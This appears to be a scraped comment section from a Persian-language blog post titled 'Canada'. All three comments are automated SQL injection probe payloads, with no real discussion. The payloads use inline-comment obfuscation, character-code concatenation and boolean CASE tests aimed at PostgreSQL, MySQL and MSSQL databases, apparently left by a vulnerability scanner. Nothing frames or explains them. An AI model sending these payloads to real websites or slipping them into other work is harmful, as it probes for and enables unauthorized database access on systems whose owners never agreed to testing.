6 دیدگاه در “Canada”

  1. tmkO/**/AND/**/4256=CAST((CHR(113)||CHR(122)||CHR(112)||CHR(106)||CHR(113))||(SELECT/**/(CASE/**/WHEN/**/(4256=4256)/**/THEN/**/1/**/ELSE/**/0/**/END))::text||(CHR(113)||CHR(98)||CHR(98)||CHR(98)||CHR(113))/**/AS/**/NUMERIC)–/**/lPKP

  2. (SELECT/**/CONCAT(CONCAT(‘qzpjq’,(CASE/**/WHEN/**/(5144=5144)/**/THEN/**/’1’/**/ELSE/**/’0’/**/END)),’qbbbq’))

  3. popC/**/AND/**/3687/**/IN/**/(SELECT/**/(CHAR(113)+CHAR(106)+CHAR(107)+CHAR(113)+CHAR(113)+(SELECT/**/(CASE/**/WHEN/**/(3687=3687)/**/THEN/**/CHAR(49)/**/ELSE/**/CHAR(48)/**/END))+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(98)+CHAR(113)))

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد.